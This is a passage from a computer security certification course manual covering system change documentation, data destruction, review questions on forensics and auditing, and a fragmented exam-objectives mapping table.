In addition to architecture documentation, each individual system should have a separate document that describes its initial state and all subsequent changes. This includes configuration information, patches applied, backup records, and even suspected breaches. Printouts of hash results and system dates of critical system files may be pasted into this book. System maintenance can be made much smoother with a comprehensive change document. For instance, when a patch is available for an operating system, it typically only applies in certain situations. Manually investigating the applicability of a patch on every possible target system can be very time consuming; however, if logs are available for reference, the process is much quicker and more accurate.
1719
Destruction
Finally, appropriate methods for destroying data, records, and even entire systems should be detailed. Simply deleting a file does not actually remove it from the disk, but merely removes the pointer to the data. To actually make the disk unreadable is a more complex process or requires physical destruction. If a system or data on that system has been identified as a corporate asset, then improper destruction will always be a threat leading to a potential vulnerability, and it should be treated as such.
E-1:
Discussing documentation
1721
Topic B
Topic C
Topic D
Topic E
Review questions
1 What is computer forensics?
The acquisition and analysis of evidence pertaining to a computer security incident.
Preparation Collection of evidence Authentication Examination of evidence Analysis of evidence Documenting and reporting of evidence
4 Collecting evidence may destroy other evidence. True or false?
True
5 When collecting evidence, you should start by restarting the computer. True or false?
False. Do not shutdown until the most volatile evidence has been collected.
8 Education about computer systems and potential security risks is one of the most cost-effective tools in computer security. True or false?
True
9 Delivery of security training should never be delivered online as it is a risk to the organization for it to be online. True or false?
False. It is one of the most effective ways of delivering the information to large groups of users.
10 In auditing a system, what are the two procedures system scanning typically involves?
First, using well-known network and system assessment tools, the scan gathers information about the system and network configuration to determine vulnerable entry points that a hacker could use to gain access. Second, system scanning uses what is known as Penetration Testing.
11 System security scanning should only be done in-house since third-party scanning exposes the system to additional risks. True or false?
False. It can be a more objective scan if an outside party performs it.
Computer forensics and advanced topics 13 List the types of documentation you need to maintain for a secure network environment.
1723
Standards and guidelines Systems architecture Change documentation Logs and inventories Classification and notification Retention and storage Destruction
14 Information intended only for the person to whom it was sent should be marked: A Unclassified. B Classified.
C
Confidential.
D Secret.
A1
A2
1.4
Recognize the following attacks and specify the appropriate actions to take to mitigate vulnerability and risk DOS / DDOS (Denial of Service / Distributed Denial of Service) Back Door Spoofing Unit 3, Topic A A-3, A-4 E-1 H-3 C-3 E-1
A3
Supporting activities
Replay
TCP/IP Hijacking Weak Keys Mathematical Social Engineering Birthday Password Guessing Brute Force Dictionary Software Exploitation 1.5 Recognize the following types of malicious code and specify the appropriate actions to take to mitigate vulnerability and risk Viruses Trojan Horses Logic Bombs Worms 1.6 Understand the concept of and know how reduce the risks of social engineering Understand the concept and significance of auditing, logging and system scanning
Unit 3, Topic E Unit 3, Topic G Unit 3, Topic G Unit 3, Topic F Unit 3, Topic G
Unit 3, Topic H Unit 3, Topic H Unit 3, Topic H Unit 3, Topic H Unit 3, Topic F
H-1 H-1
H-3 F-1
1.7
D-1
A4
Unit 4, Topic B
Unit 4, Topic C
C-3, C-4
C-4 C-4
C-1 C-1
Unit 6, Topic A
A-8
A5
Supporting activities
Unit 7, Topic A
A-1
8.3 Naming Conventions 2.6 Recognize and understand the administration of the following wireless technologies and concepts WTLS (Wireless Transport Layer Security) 802.11 and 802.11x WEP / WAP (Wired Equivalent Privacy / Wireless Application Protocol) Vulnerabilities Site Surveys
Unit 8, Topic B Unit 8, Topic A Unit 8, Topic B Unit 8, Topic C Unit 8, Topics A-C Unit 8, Topic C
C-3, C-4
A6
Unit 10, Topic A Unit 10, Topic B Unit 10, Topic B Unit 10, Topic B Unit 10, Topic B Unit 10, Topic B Unit 10, Topic B Unit 10, Topic B
A-1, A-2
A7
Supporting activities
A-3, A-4
D-1
A8
Unit 13, Topic C Unit 13, Topic C Unit 13, Topic C C-4
A9
Non-Repudiation Digital Signatures Access Control 4.3 Understand and be able to explain the following concepts of PKI (Public Key Infrastructure) Certificates
Unit 2, Topic D Unit 6, Topic A Unit 14, Topic B Unit 14, Topic B Unit 14, Topic B Unit 14, Topic C Unit 14, Topic B Unit 14, Topic B
Certificate Policies Certificate Practice Statements Revocation Trust Models 4.4 Identify and be able to differentiate different cryptographic standards and protocols
A10
Unit 14, Topic C Unit 14, Topic C Unit 14, Topic C Unit 14, Topic C
A11
Environment Wireless Cells Location Shielding Fire Suppression 5.2 Understand the security implications of the following topics of disaster recovery Backups Off Site Storage Secure Recovery Alternate Sites Disaster Recovery Plan 5.3 Understand the security implications of the following topics of business continuity Utilities High Availability / Fault Tolerance Backups
Unit 16, Topic A Unit 16, Topic A Unit 16, Topic A Unit 16, Topic A Unit 16, Topic A
A-1 A-1
A-1
Unit 16, Topic B Unit 16, Topic B Unit 16, Topic B B-1 B-1
A12
C-2 C-3
A13
Supporting activities
A14